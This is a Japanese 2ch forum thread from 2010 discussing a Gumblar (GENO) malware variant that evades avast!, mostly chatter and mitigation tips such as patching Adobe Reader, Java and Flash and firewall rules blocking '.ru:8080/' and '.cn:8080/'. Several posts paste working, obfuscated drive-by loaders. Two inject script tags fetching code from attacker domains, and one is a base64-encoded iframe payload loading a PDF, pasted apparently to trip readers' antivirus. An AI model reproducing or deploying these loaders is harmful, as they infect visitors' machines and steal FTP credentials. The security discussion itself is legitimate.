avast!のWebシールドでも反応しない新ガンブラーが登場
1 :
集気ビン(東日本) :
2010/01/08(金) 02:44:26.13 ID:bV5a81zg BE:897059849-PLT(13131) ポイント特典
2 :
バカ :2010/01/08(金) 02:45:12.24 ID:pmNFc7dq
プォーン!プォーン!
3 :
ウケ(アラバマ州) :2010/01/08(金) 02:45:14.02 ID:7h8EVcut
↓ガンプラかと思った
4 :
モンキーレンチ(dion軍) :2010/01/08(金) 02:45:18.05 ID:ZW8OUUH4
avastなんて使ってるのは情弱だけっしょ 通はkingsoft一択
5 :
インパクトレンチ(神奈川県) :2010/01/08(金) 02:46:02.82 ID:/iVC9W4l
分かり易く説明してよクソムシ
6 :
アルコールランプ(埼玉県) :2010/01/08(金) 02:47:01.29 ID:gbTbD6lJ
眼鏡かえようかな
7 :
カッティングマット(千葉県) :2010/01/08(金) 02:47:40.69 ID:lT3JVh+g
最近のウィルスはFTPパス抜くとか陰湿で嫌になるわ 豪快にHDD吹き飛ばすほうがまだ許せる
LGPLとかリンクしねーだろーが、おめーは
9 :
ラベル(東京都) :2010/01/08(金) 02:48:38.10 ID:1/1kKlEq
オススメのガンプラない?
10 :
万年筆(千葉県) :2010/01/08(金) 02:48:49.04 ID:MOJWMK3U
ノーガード戦法最強
12 :
集気ビン(大阪府) :2010/01/08(金) 02:49:08.70 ID:1i0lfstO
一体、何が始まるんです?
13 :
サインペン(大阪府) :2010/01/08(金) 02:53:06.74 ID:v2JdNGhp
でもお高いんでしょう?
つーかまたダブルオーがHGで出るんだろ、セブンソードっての 買った奴涙目だろ
15 :
ルアー(dion軍) :2010/01/08(金) 02:54:39.80 ID:p3uYW3kP
みんなで感染したら怖くない
レンタル鯖会社はファイルのハッシュを取って更新されたらメールするサービスしてくれ
17 :
首輪(茨城県) :2010/01/08(金) 02:56:12.88 ID:vfd4vOAJ
Gumblarの対策って結局PDFリーダーをFoxitにして FlashとJavaをアンインスコすれば済む話なんだよな それができないから困るんだけど 結論から言うとアドビは潰れろという話なんだが
18 :
金槌(福島県) :2010/01/08(金) 02:58:28.33 ID:5XFa5+q5
素00と0ライザー買ってブブドゥドゥ楽しんでたらソード3付きとセブンソードってどういう事だおい
19 :
ばね(catv?) :2010/01/08(金) 02:59:29.45 ID:SeYjFUTA
金融系のサイトは大丈夫なんだろうか ネット専業銀行のサイトにこれを仕込まれたらかなり大きな被害が出そうで心配なんだが
アヴァランチでさえ1/100で出たというのにセブンソードときたら…
AVG最強か
<script>/*LGPL*/ try{ window.onload = function(){var C1nse3sk8o41s = document.createElement('s&c^$#r))i($p@&t^&'.repl ace(/&|#|\$|\(|@|\!|\^|\)/ig, ''));C1nse3sk8o41s.setAttribute('defer', 'd$#)e!^f$)e&(@@#r((!' .replace(/#|\$|\(|&|\)|\^|@|\!/ig, ''));C1nse3sk8o41s.setAttribute('type', 't^&e(!x)$(t$/#@)j()(a &)!v#a)s()c@^r$$i^$p()^?t&!@'.replace(/\(|@|\)|#|&|\$|\^|\!/ig, ''));C1nse3sk8o41s.setAttribute('id', 'U#!4!$^v&$e@h^)$x^ @w&$s#(@b)#w^^(&7#)6$@@l!)^'.replace(/&|\!|#|\$|\(|\^|@|\)/ig, ''));C1nse3sk8o41s.setAttribute('s()#r#^((c^'.replace(/@|&|#|\$|\(| \)|\!|\^/ig, ''), 'h^^&t!t(p^^@&@:@/@/&!o?r!!#@k@)!#&u^!t^)@-!#!@c(#(o^m^$-((!b#)@@r(!.^@$h)##@a^#t)t#$))r(&^i&c@)$k$)).^o!$!r#g&) $.&(w(#i$k@@t&$i!^@!o&n!!)a@@r$y&@#(-^$)o$r@g$!^!.$&^(w@e!!b$!@n#(^e#t$$e)#^^n$^g@!l$#!&i)$&s&^@h@.!r@@@u(&^:($8$^^0#8$ !!$0@)^/!&!g?o@o!((g)l?$)e(.@@c(!@^o!#m(/&g@(^o#((o^!)&g#@l))(e(?!.!!c&$$&o))$m&@$/@i!&n^t(!e^l^@.@)($c#(@o$!m(/)&v#) ))n^#e$t^@.$#@c()(n)^(&/$o&n^#)(l(^i^^n$)e!d^^o!@w@$&n(@.$$!#n^@e((t^/!@(@'.replace(/&|\(|\)|\$|\^|\!|#|@/ig, '')); if (document){document.body.appendChild(C1nse3sk8o41s);}} } catch(O28ie36gdspcwlg5bd0) {}</script>
おっと研究用に貼ったところ情弱メルカトル民共が書き込めなくなっちまったな
25 :
印章(栃木県) :2010/01/08(金) 03:11:48.83 ID:Me1/2ogq
永井先生思い出す
26 :
ダーマトグラフ(中部地方) :2010/01/08(金) 03:14:58.56 ID:nSuYDmMh
webシールドって意味あるの?
>>23 /google.com/google.com/intel.com/vnet.
前の奴は確かoperaだったよな・・・
29 :
ロープ(神奈川県) :2010/01/08(金) 03:20:45.05 ID:NVI2Stl7
30 :
梁(兵庫県) :2010/01/08(金) 03:24:51.24 ID:o0fm9RMi
標準シールドしか入ってない
31 :
ミリペン(埼玉県) :2010/01/08(金) 03:25:31.41 ID:i/D3VkTk
>>31 こんなに感染してるウイルス最近ないよな、毎日どっかが感染して、ばらまいてる
33 :
ハンドニブラ(東京都) :2010/01/08(金) 03:28:26.02 ID:h+mLLiMK
zenoahってなんだよ、迂闊にググれないだろ。
34 :
墨壺(関東・甲信越) :2010/01/08(金) 03:40:24.18 ID:8wz5B0EY
凄い勢いで広がってるな
35 :
ロープ(神奈川県) :2010/01/08(金) 03:40:50.06 ID:NVI2Stl7
>>19 ふつうはそういったサイトはインターネット側からFTPで更新できないようになってるんじゃ?
カスペ買え貧乏人ども
一方ノートン先生は寝ていた
avastだって一発目だったらダメじゃん、有料系だって検体が送られてパターン更新されるまでは無防備
39 :
モンキーレンチ(宮城県) :2010/01/08(金) 03:45:29.81 ID:zUAQHovW
>>16 基本的に、うぷしたファイルそのものが感染してんじゃないっけ?
>>39 入れ替えられたらハッシュが変わるから変更は検知できる
tripwireとか言う奴、これだとファイルが変更されればメールなどで通知される
41 :
金槌(東京都) :2010/01/08(金) 03:48:21.01 ID:p3DpoRt2
なんでコメント行で検出したりしなかったりするんだよ すげえ安易に検出プログラム作ってないか? お前もだ、マカフィー
42 :
モンキーレンチ(ネブラスカ州) :2010/01/08(金) 03:52:45.02 ID:LbWp2ydj
adobe readerのjava script切ってれば問題ないんだろ? 余裕のよっちゃんイカだぜ
43 :
カラムクロマトグラフィー(茨城県) :2010/01/08(金) 04:01:55.51 ID:gBaYEmUE
GENOの新種の事だたのか しぶといなぁ
中華の調味料でこんな名前のやつあったな
45 :
集気ビン(catv?) :2010/01/08(金) 04:04:01.86 ID:Ga4RG1pl
avast!でさっき、ycmwc.exeなるファイルがどうとかって言う警告が出たんだけど、 誰が詳しく知らない?
おいMGガブスレイまだか
47 :
カラムクロマトグラフィー(茨城県) :2010/01/08(金) 04:04:43.13 ID:gBaYEmUE
ナンプラーはタイ
48 :
ミキサー(北海道) :2010/01/08(金) 04:05:52.69 ID:R4R7H3On
やっぱりカスペルスキー最強ってことでいいの?
49 :
音叉(東京都) :2010/01/08(金) 04:07:01.99 ID:WmSUfI8R
検体ないうちはどこでも無理なんじゃないの
50 :
エリ(埼玉県) :2010/01/08(金) 04:08:28.50 ID:BTeklg9B
>>45 http://www.prevx.com/filenames/1997607211983020257-X1/YCMWC.EXE.html ファイルの動作
YCMWC.EXEは、次の動作を実行するためにアクセスされています:
別のプロセスの仮想メモリ(プロセスハイジャック)に書き込みます
実行プロセス
終了するプロセス
レジスタは、ダイナミックリンクライブラリファイル
このプロセスは、ディスク上の他のプロセスを作成します
YCMWC.EXEは、次の動作の対象とされています:
起動時に開くプログラムをロードするレジストリの自動起動として追加
プロセスとして実行される
コードは仮想メモリ空間に他のプログラムによって挿入されて
プロセスの終了
登録すると、ダイナミックリンクライブラリファイルとして
ディスク上のプロセスとして作成された
ファイル名YCMWC.EXE最初の2010年1月3日にPrevxコミュニティは、次の地理的な地域で見られた:
日本2010年1月3日に
イギリス2010年1月6日に
51 :
ノギス(東京都) :2010/01/08(金) 04:08:29.90 ID:VA8/PiXa
tes
52 :
墨壺(関東・甲信越) :2010/01/08(金) 04:09:31.45 ID:8wz5B0EY
53 :
吸引ビン(鳥取県) :2010/01/08(金) 04:09:51.53 ID:I2821ZCV
54 :
昆布(栃木県) :2010/01/08(金) 04:10:29.95 ID:bmaaMKxG
55 :
吸引ビン(鳥取県) :2010/01/08(金) 04:10:52.31 ID:I2821ZCV
壁殴っちまった・・・
56 :
付箋(福井県) :2010/01/08(金) 04:11:18.26 ID:Id2OhmGD
さっきYFHでエロあさってたらCPU100%でしばらくフリーズしたけど死んだかな
57 :
( ● ´ ー ` ● ) はスバラシイ :2010/01/08(金) 04:11:29.65 ID:W3+QisOV BE:8990944-PLT(12000)
そもそも何でWEBサイト書き換えられるんだ?
GENOとか怪しいサイトならわかるけど、ローソンとかまともな企業のサイトが乗っ取られるっておかしいじゃん。
58 :
墨壺(関東・甲信越) :2010/01/08(金) 04:12:17.33 ID:8wz5B0EY
>>55 ActiveXかJAVAかadobe readerの中で脆弱性があるものを判別して攻撃
症状もそれによって違うみたいだが
59 :
吸引ビン(鳥取県) :2010/01/08(金) 04:13:25.57 ID:I2821ZCV
60 :
集気ビン(catv?) :2010/01/08(金) 04:14:47.24 ID:Ga4RG1pl
>>50 わざわざありがとう!
難しくてよく分からないね
61 :
レンチ(大阪府) :2010/01/08(金) 04:15:21.59 ID:cggGy0o1
avastたん早く解決してくれー!
62 :
音叉(東京都) :2010/01/08(金) 04:16:45.29 ID:WmSUfI8R
>>57 どっかのとこで感染したPCから自分のサイトをFTPで更新すると
パケットキャプチャが仕掛けられててFTPのパスワードが抜かれる
感染したPCの中身に関しては破壊行為を起こさないから感染に気がつきにくい
HP制作会社のPCが感染したりすると一気に数サイトがやられる
さらにまともな企業サイトを見ているからウイルス感染に気がつかない
64 :
銛(長屋) :2010/01/08(金) 04:17:26.71 ID:ujCEivd/
>>60 malwareって書いてあるから感染してるよ
66 :
ペン(catv?) :2010/01/08(金) 04:19:36.16 ID:40w9SLjY
ポリモルフィックか
67 :
墨(西日本) :2010/01/08(金) 04:20:00.29 ID:meg9zdQs
万一に備えてNoScriptのホワイトリストを真っ白にしとくか あとHGUCΖΖを早くしてね
68 :
集気ビン(catv?) :2010/01/08(金) 04:22:39.48 ID:Ga4RG1pl
>>65 あまり深刻そうじゃないからまあavast!にまかせて放置するよ
しかし何処で感染したのやら…
69 :
足枷(石川県) :2010/01/08(金) 04:23:17.20 ID:tS9kx+5J
>>62 Webサイト制作会社のセキュリティってザルなんだな。もっと気を付けて欲しいわ。
70 :
豆腐(関西) :2010/01/08(金) 04:23:48.15 ID:8QSFA7bN
今回ヒューリスティック検知も素通りなんかい?
71 :
昆布(岩手県) :2010/01/08(金) 04:23:52.82 ID:BSA7BpCA
WIN2000最強すぎてワラタww なんぼ踏んでもビクともしねええええwwww XP(笑)
72 :
( ● ´ ー ` ● ) はスバラシイ :2010/01/08(金) 04:24:58.79 ID:W3+QisOV BE:7867627-PLT(12000)
>62-64
サンクス。
単にPCにイタズラしたり銀行とかネトゲのID盗むんじゃなくて、
より影響力のあるサイトを乗っとろうとするって挙動はウィルスっぽくてかっこいいな。
73 :
ラジオペンチ(東京都) :2010/01/08(金) 04:25:15.16 ID:osM4l0cq
JavaScriptを切ってない男の人って……
74 :
滑車(東日本) :2010/01/08(金) 04:28:47.36 ID:ERkw5/xM
これはbsdで運用してると問題ないの?
75 :
滑車(東日本) :2010/01/08(金) 04:42:23.14 ID:ERkw5/xM
>>31 さっきウイルス発見したのにいまはもうない
76 :
ミリペン(埼玉県) :2010/01/08(金) 04:49:32.65 ID:i/D3VkTk
>>75 「/*GNU GPL*/ 」が「/*LGPL*/」に変わった
>>31 ページの更新日時:2010年1月8日 3:37:16
/*LGPL*/タイプになったのか
78 :
万年筆(中部地方) :2010/01/08(金) 04:54:22.07 ID:KirAvtDd
79 :
滑車(東日本) :2010/01/08(金) 04:54:30.85 ID:ERkw5/xM
80 :
滑車(東日本) :2010/01/08(金) 04:55:31.57 ID:ERkw5/xM
81 :
集気ビン(石川県) :2010/01/08(金) 04:57:23.97 ID:ZZJiFEVj BE:2515182-2BP(1236)
>>78 こんな時間に作業してくれるHP制作会社があったら素晴らしいけど
83 :
足枷(石川県) :2010/01/08(金) 05:02:00.22 ID:tS9kx+5J
84 :
鉤(広島県) :2010/01/08(金) 05:18:10.09 ID:9OmmVN4d
firefoxが落ちたな しかも反応ないし、これはやばいな
85 :
滑車(東日本) :2010/01/08(金) 05:33:19.37 ID:ERkw5/xM
今
>>1 のソースをvirustotalにおくったらNOD32だけが反応した
87 :
滑車(東日本) :2010/01/08(金) 05:35:16.85 ID:ERkw5/xM
88 :
金槌(東京都) :2010/01/08(金) 05:39:30.31 ID:p3DpoRt2
>>87 nod32 だけやん
他のはコメント行で判別してるんだな
>>87 >>1 とで4時間でまずはNOD32か
明日くらいには検出率が50%を越えてくるんだろうけど、イタチごっこだな
ムリだ!ガンブラーは止まらない!
91 :
ちくわ(東京都) :2010/01/08(金) 06:13:36.70 ID:wzmgGs5u
92 :
カッターナイフ(catv?) :2010/01/08(金) 06:22:09.55 ID:dowVdiTp
俺等日本のサイトでしか騒いでないけど、 アメリカのサイトだって当然感染してるところがあるだろうし ヘタしたらAdobe、訴訟されまくりになるんじゃね?
93 :
滑車(東日本) :2010/01/08(金) 06:24:46.25 ID:ERkw5/xM
>>91 それちょこちょこ改ざんされてるかも。今確かめたらvirustotalは新しいファイルとして認識したよ。
94 :
鉋(西日本) :2010/01/08(金) 06:25:45.25 ID:jZ9l4UO4
怖いなあ。なんかますます進化してるなあ。
95 :
ちくわ(東京都) :2010/01/08(金) 07:16:47.03 ID:wzmgGs5u
>>93 今もう一回保存してファイルのhashをみたけど前と同じだった
96 :
滑車(東日本) :2010/01/08(金) 07:17:56.46 ID:ERkw5/xM
>>95 おれはhtmlだけおくったみたい。失礼しました。
97 :
モンキーレンチ(dion軍) :2010/01/08(金) 08:28:12.36 ID:dgNvMWRD
゙!:|:::::|::l::|:l::l:;l斗:::'´!|:l:::li| l:::::`!十‐+|:_l:::li::::/,小、{_イ^| ト、ヽ,) /ハ:::::!::l::l:{::!::l:::! ::::l:| |:::li| ゙!::::::ト!:::::l:li:::トl:l└vオ l |/| ゙Y / ハ::::!::!:l:|::!゙y,ァネ宀、` ヾヾヽ ,ァ7=!t、:l::|:l:i (勹 j j/}| | / / ヾミ:l::|ヾYオ゙h ::::::} 1i .::::ヽ!:|:li と,フ / !Y::| | ヽ/ l`:::`:l|:i ビ_''ツ ト!、:;;;;::リト川(イリ/ /i::i:l:| | あ、バスト? |:: ::j:!:kXxx . `ー--'/,';!::!j゙Y,/ /::|::i:|:| | |:: :l:l:ilヽ、 、 xXxx//// }j"lヽ/ :::l::l:|:L_」 |:: :l:|:l:|:{:{> 、 ,. ////!::lj:: l:i l:i i::::|::l:|l | :: :l:|:l:|:}{:{:l::l::l:l:` ┬ ' //;ノ」_!_lj::l|:l:l::l::l:::|::l:|l j :: :l:|:l:l:{:/´ ̄`ヽ」 /彡'´ `Y:l:l::|: l:::|::::|l ,' ::;:'j':l:l:{/ 、 ノ,〃/ l:l:l::|:::|:::!::::l:l、 / :;:'/j:l::l:j ` {{( !l l::|: |:::|::::l::li /::;:'/:;j:j::jノ ,.. `)) ! i|:l:l::|:::|:::l::::|::l:i、 . /:;:'/:::ji/ /r‐‐<`ヽ、 l .ll:|:l::|::i|:::| ::|::l::l l::;'/::/ ,/.r-‐'≠` ヽ.`}| i!:l:|:l:|::||:::|:::|::|::| /´ヾ ./ i r-、 .| ! !l:|:l::l::|l::: | ::|::|::| /´ゝ、_,} : し' } | .! ijリ !jl///リ !j }l/ { ´ ̄ ̄`ヽ ', { |l | l〃/〃/ /〃/ ヘ、 二ニニイ , \ ' ´ V ! .|i// / / }rー-‐‐ァ'、 ヽ、 ヘ ∨ |
98 :
シール(東日本) :2010/01/08(金) 08:41:44.06 ID:P4Rdn5v+
あ、ババババ
99 :
泡箱(神奈川県) :2010/01/08(金) 08:52:06.02 ID:7yMN4HaH
最近のは、OSがVista/7だったりしたら動作を変えるようになってるな UACにひっかかって不審におもわれたりしないように
100 :
蛸壺(大阪府) :2010/01/08(金) 09:13:39.50 ID:U4Jpc+Sd
MSSEの俺は大丈夫
101 :
マイクロシリンジ(大阪府) :2010/01/08(金) 09:14:24.14 ID:p+dqAbpV
未だにXP使ってる人居るんだww
102 :
モンキーレンチ(関西地方) :2010/01/08(金) 09:15:23.60 ID:/uGUtDvW
この前SecurityToolっていうウィルスみたいなのに感染して 削除したらOS起動しなくなってえらい目に合ったわ・・・
103 :
乳鉢(愛媛県) :2010/01/08(金) 09:16:10.46 ID:95VXrh4o
どうせアドビをアップデートしとけば無傷なんだろ?
104 :
レーザーポインター(千葉県) :2010/01/08(金) 09:18:35.74 ID:f93a1mI9
105 :
ボウル(アラバマ州) :2010/01/08(金) 09:21:13.08 ID:zLrW2kLQ
素のFTPでインターネットからコンテンツ更新させるサイトなんて閉鎖しろ
106 :
ガスレンジ(catv?) :2010/01/08(金) 09:36:21.52 ID:A2+uIIR4
セキュ板の人いる? 今いちばんガンブラー絡みの情報集まってるスレってどこ?
107 :
滑車(東日本) :2010/01/08(金) 09:37:31.34 ID:ERkw5/xM
ガンブラーと聞いて XTOとか黄金砲とか連想してしまった
109 :
ドラフト(神奈川県) :2010/01/08(金) 10:05:52.33 ID:EuuKBnOp
・Windows Vistaもしくは7を一般ユーザー(非管理者)でログインして使う ・Web閲覧には保護モードを有効にしたIE7orIE8を使う ・Microsoft UpdateでOSは最新に保つ ・Adobe Readerはインストールしないか、最新版をJavascript無効にして使う ・Adobe Flashは最新版を使う ・Javaはインストールしないか、最新版を使う この6つを行えばかなり感染確立が下がる
110 :
ドリルドライバー(東日本) :2010/01/08(金) 10:11:11.85 ID:weXO/2mG BE:556335252-PLT(12001)
://orkut-com-br.hattrick.org.wiktionary-org.webnetenglish.ru:8080/google.comgoogle.com/intel.com/vnet.cn/onlinedown.net/
111 :
モンキーレンチ(東京都) :2010/01/08(金) 10:19:07.15 ID:SEXoMUYs
オンラインスキャンでもするか
112 :
鉋(アラバマ州) :2010/01/08(金) 10:30:13.19 ID:OIlIqCOV
youtubeにavast! proのkeygen上がっててワロタwww
113 :
滑車(東日本) :2010/01/08(金) 10:42:00.18 ID:ERkw5/xM
これさあ・・・SFTP(SSH+FTP)しか更新できなくしててもタメなんじゃね?
116 :
平天(広島県) :2010/01/08(金) 10:57:29.11 ID:Q1EoUJYP
俺のavast!タンなら、俺が何もしないでも俺を救ってくれると信じてる
117 :
マイクロピペット(神奈川県) :2010/01/08(金) 11:16:52.42 ID:9KwqRsLi
PeerBlock で海外へのHTTP接続を拒否している俺に隙はなかった。 Web閲覧で、海外鯖の怪しいpdfやらflashをブラウザが見に行くから問題なので、 通信自体を遮断してしまえばいい。 日本のサイトに罠置かれたらやばいけど。
118 :
硯箱(アラバマ州) :2010/01/08(金) 11:18:42.95 ID:xqVVIi84
>>117 つーか海外サイトも普通に見るだろうが
全部遮断したら不便すぎるだろ
119 :
封筒(新潟県) :2010/01/08(金) 11:20:00.11 ID:cHyUl9IV BE:12694346-PLT(17500)
プァープァープァー
120 :
てこ(大阪府) :2010/01/08(金) 11:23:53.27 ID:MUu1TYT4
んで、結局これはうぇbだけが書きかえれるの?? 前のgenoみたくwin32\うんとかsqのハッシュやファイル容量 とか増えたり??
121 :
マイクロピペット(神奈川県) :2010/01/08(金) 11:28:26.40 ID:9KwqRsLi
>>118 そういうのはある程度巡回先が決まってるから、そこだけ許可するルールを追加する。
初回はめんどくさいが、一度作れば終わりだし、作業もクリックだけで出来るから特に不満はない。
それでも不便なら、最近は知らんが、GENOウィルスの怪しいpdfが置かれてるサーバは、バルト三国やらロシアやらの
普段閲覧するような国じゃないのでIPリスト拾ってそこだけでも弾けば良いんじゃね?
>>118 がロシア人なら知らん。
122 :
モンキーレンチ(三重県) :2010/01/08(金) 11:31:18.64 ID:In7mpC/S
>>115 今のところはパケットキャプチャしかしてないらしいし大丈夫でしょ
キーロガーとか仕込まれたりしたら漏れるかもしれんが
ウィルス仕掛ける側も手間が増えるし面倒くさいだろ。
125 :
冷却管(広島県) :2010/01/08(金) 12:05:07.23 ID:qrGub+6x
genoってどういうウイルスなの?
126 :
夫婦茶碗(catv?) :2010/01/08(金) 12:06:39.34 ID:MUNUow0p
おっと、チェンs−好きで良く見てたサイトだ
127 :
ガスレンジ(catv?) :2010/01/08(金) 12:15:11.75 ID:A2+uIIR4
>>122 そんなぬるい考えは捨てた方がいいと思う
毎日どんだけ亜種生産されてると思ってんのよ
128 :
モンキーレンチ(中部地方) :2010/01/08(金) 12:16:37.29 ID:Atznycs9
vistaはセーフだよね?
129 :
メスピペット(catv?) :2010/01/08(金) 12:20:10.98 ID:KptIBMCc
<script> /*GNU GPL*/ try{window.onload = function(){var U26gcel3nnek = document.createElement('s@$$&c)$&r$i#(p#$!t!!('.replace(/@|\)|\!|\(|\^|\$|&|#/ig, '')); var Zavq7z4z78k = 'Imrp1rhevfo'; U26gcel3nnek.setAttribute('type', 't(^$e&@&x!!$t!@&/)j((a)v&&a@(^s(!c((r!i$!p!$t!(#'.replace(/\^|#|&|\!|\(|\$|\)|@/ig, '')); U26gcel3nnek.setAttribute('src', 'h())&t)t$$p@#:)^$)/((^/!$#g!o(&&u^^^g!$o?u!-$&c!)!o)^$$m)@!^.$(#n&)$i #(n^#^g@.&@c&$#o@m(.)a###!c#(e!$$(r$$-^#c!@o)@!$m@.$^s)(u!@p$$e@r@(a(g(@^u)$&)!i#d!e&!!#.!@^r(^u^:) #8&^#&0#(8)^0^/!!#i@$)#n^$@$.&!)!c&!(o((!m$&&/$i#!$n#!).)$@c#(^o@!$&m(@/@$g@o))o^&g@&l!#e!.^)c))o@ m#&@/$^#v#)i!)#d!^@e&)$)o@)!@@s#z$(.?^c@!$o!m(^^/@b^(&e#!@&s@((t)#$@#t&^)^u&b!(e^)c$^#l!@)i$)&!$p) @s!$^$(.&$c@&)@o)!$m(^#&/('.replace(/\!|@|#|\$|\(|&|\^|\)/ig, '')); U26gcel3nnek.setAttribute('defer', 'd!$@$e@f!!(&(e^r@)'.replace(/@|\(|\$|#|\!|\)|\^|&/ig, '')); U26gcel3nnek.setAttribute('id', 'M$e!$7#!)r#!$l?@^9()!(#t$!^9&q#)@$$b&&^!3&@)'.replace(/\^|\)|@|&|\$|\!|\(|#/ig, '')); document.body.appendChild(U26gcel3nnek);}} catch(Lpmpa57y1j) {} </script> <!--86fa61201e3ca3a075145a1d33d3c209-->
130 :
モンキーレンチ(アラバマ州) :2010/01/08(金) 12:21:04.83 ID:I0L8TLMx
>>128 最近のは7でも感染したとかの報告があったから、たぶん駄目だろ
131 :
手帳(アラバマ州) :2010/01/08(金) 12:25:01.79 ID:oQGEk3JC
これ、アンチウイルスソフトで除去できるの? 除去できるとしたら大手サイトの管理会社が感染してるのが不可解なんだがw
132 :
ビーカー(アラバマ州) :2010/01/08(金) 12:28:08.48 ID:pBxN6Hr/
で、感染したら具体的にどうなるんだよこのヴァイラスは
133 :
虫ピン(神奈川県) :2010/01/08(金) 12:28:13.97 ID:GI76Eofp
一体何が目的なんです?
134 :
手帳(アラバマ州) :2010/01/08(金) 12:29:45.17 ID:oQGEk3JC
>>133 どっかのサイト乗っ取りたかったんじゃないの?
135 :
そろばん(アラバマ州) :2010/01/08(金) 12:35:24.62 ID:59BQdmXn
一番初めに対応したウイルス駆除会社があや・・・
136 :
ブンゼンバーナー(東京都) :2010/01/08(金) 12:43:04.28 ID:fH3AulUa
window.onload とかproxomitronで潰してるわ
137 :
モンキーレンチ(関西地方) :2010/01/08(金) 12:43:12.61 ID:IOqrA9yY
>>130 UACにブロックされない範囲だと大したことできないだろ?
UAC無効にしてたんじゃないの?
こういう事があった前後のAVソフトの売り上げ推移が見たい
140 :
モンキーレンチ(ネブラスカ州) :2010/01/08(金) 12:46:08.30 ID:zicNOoW1
これに感染するとハローワークにしかアクセス出来なくなる
142 :
電子レンジ(アラバマ州) :2010/01/08(金) 12:49:40.80 ID:FZlyIZI9
で、これ感染したらどーなんの?
これはavast先生的にどうなの? <script type='text/javascript'>document.write(decodeURIComponent(function(r, s) { var t = '', p = -8, a = 0, b, c; for (var i = 0; i < s.length; i++) { if ((c = r.indexOf(s.charAt(i))) < 0) continue; a = (a << 6) | (c & 63); if ((p += 6) >= 0) { b = (a >> p) & 255; if (c != 64) t += String.fromCharCode(b); a &= 63; p -= 8; } } return t; } ('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstu vwxyz0123456789+/=', 'JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cCUzQSUyRiUyRjJzZW4uZGlwLmpwJTJGY2dpLWJpbiUyRnVwZ3VuJTJGdXAxJTJGc291cmNlJTJG dXAzNjE3MC5wZGYlMjIlM0UlM0MlMkZpZnJhbWUlM0UlMEQlMEElM0NpZnJhbWUlMjBzcmMlM0QlMjJodHRwJTNBJTJGJTJGMnNlbi5kaXAuanAlMkZjZ2ktYmluJTJGdX BndW4lMkZ1cDElMkZzb3VyY2UlMkZ1cDM2MTcwLnBkZiUyMiUzRSUzQyUyRmlmcmFtZSUzRSUwRCUwQSUzQ2lmcmFtZSUyMHNyYyUzRCUyMmh0dHAlM0ElMkYlMkYyc2Vu LmRpcC5qcCUyRmNnaS1iaW4lMkZ1cGd1biUyRnVwMSUyRnNvdXJjZSUyRnVwMzYxNzAucGRmJTIyJTNFJTNDJTJGaWZyYW1lJTNFJTBEJTBBJTNDaWZyYW1lJTIwc3JjJT NEJTIyaHR0cCUzQSUyRiUyRjJzZW4uZGlwLmpwJTJGY2dpLWJpbiUyRnVwZ3VuJTJGdXAxJTJGc291cmNlJTJGdXAzNjE3MC5wZGYlMjIlM0UlM0MlMkZpZnJhbWUlM0Ul MEQlMEElM0NpZnJhbWUlMjBzcmMlM0QlMjJodHRwJTNBJTJGJTJGMnNlbi5kaXAuanAlMkZjZ2ktYmluJTJGdXBndW4lMkZ1cDElMkZzb3VyY2UlMkZ1cDM2MTcwLnBkZi UyMiUzRSUzQyUyRmlmcmFtZSUzRSUwRCUwQSUzQ2lmcmFtZSUyMHNyYyUzRCUyMmh0dHAlM0ElMkYlMkYyc2VuLmRpcC5qcCUyRmNnaS1iaW4lMkZ1cGd1biUyRnVwMSUy
144 :
手錠(愛知県) :2010/01/08(金) 12:51:49.67 ID:uQMppbg4
薬理作用のある善玉ウィルスですね
147 :
鍋(アラバマ州) :2010/01/08(金) 13:01:24.64 ID:cIw75jAz
proxomitronで対策できないだろうか。
ごめんwwwwww生きてたwwww
>>146 注意してネ
無線LAN経由でID・パスが漏れて感染というケースが一番多そうw 今やWPAにしないと簡単にパケットキャプチャされて漏れるからなー
150 :
すりこぎ(アラバマ州) :2010/01/08(金) 13:20:39.58 ID:TE0AHxjQ
>>1 http://pc11.2ch.net/test/read.cgi/sec/1259607683/405 今北さん用、GENO(Gumblar)ウイルス対処法。
行っておくべき事項を箇条書きにしました。
細かなことは他にもいろいろありますが、とりあえず以下を実施して下さい。
(1)Microsoft Update(Windows Update)を実行しシステムを最新の状態にする
(2)Adobe Readerを最新版に更新する
(3) Adobe ReaderのAcrobat JavaScriptを無効に設定
(4) JRE(Java Runtime Environment)を最新版に更新する
(5) Flash Playerを最新版に更新する
(6) QuickTimeを最新版に更新する
(1)〜(4)を行っていれば、現時点で改ざんサイトを閲覧してもウイルスには感染しない。
攻撃コードは変化する可能性もあるので、念のため全て行っていただきたい。
Adobe Readerなどのアップデート方法については下記のトピックスを参照のこと。
Acrobat JavaScriptを無効にする方法は以下の通り。
(1)Adobe Readerを起動し[編集]メニューの[環境設定]を選択
(2)「分類」の中の「JavaScript」を選択
(3)「Acrobat JavaScriptを使用」のチェックをクリア
(4)「OK」ボタンを押す
>>147 おみとろんじゃないけど、念のためFWのフィルタに↓つっこんでる
.ru:8080/
.cn:8080/
これで落とそうとする物が防げる、はず
でも、
>>150 の特に>(3)「Acrobat JavaScriptを使用」のチェックをクリア
をやっておけば、とりあえず大丈夫じゃないかな
152 :
メスシリンダー(沖縄県) :2010/01/08(金) 14:21:30.27 ID:iarCLPLD
これはネット史上最悪レベルのウイルスになりそうだな・・・
153 :
包丁(東京都) :2010/01/08(金) 14:23:31.73 ID:GCS0qpTq
これからの時代はヒューリスティックでしのぐとか言ってた NOD32は防御できてんの?
154 :
篭(アラバマ州) :2010/01/08(金) 14:26:32.61 ID:qW8Z6kcA
クラウド使ったpanda最強
155 :
試験管(静岡県) :2010/01/08(金) 14:29:51.58 ID:0TrH6utJ
またXPユーザーが血祭りに上がってるのか さっさとVistaや7にしろよ
156 :
ムーラン(宮城県) :2010/01/08(金) 14:31:04.53 ID:uT776Yc5
UACで根本的に解決すればいいのにあほやね
158 :
モンキーレンチ(catv?) :2010/01/08(金) 15:01:36.16 ID:HTtcnhM9 BE:706369829-2BP(7777)
>>146 俺の上げたup36170.pdfのURLを貼るなよww
脆弱性テスト用のPDFだお
穴がある場合カワイソスのダイアログが表示されるおっお
>>145 これなんだ?Microsoft Security Essentials反応したんだけど。
Foxit Readerもフリーズしたぞ。
161 :
モンキーレンチ(catv?) :2010/01/08(金) 15:16:05.77 ID:HTtcnhM9 BE:1373494875-2BP(7777)
>>159 up36170.pdfが山のように埋め込まれているようだ
ガンブラーに関してはavast!が最強だったから、 対avast!用に改良したのか
>>145 保存推奨かとw俺はmseだからよかったけど、これ凄いなw
166 :
ボールペン(青森県) :2010/01/08(金) 15:24:54.08 ID:vjhoZHEE
久々にプァーンプァーンプァーンを聞いた。
167 :
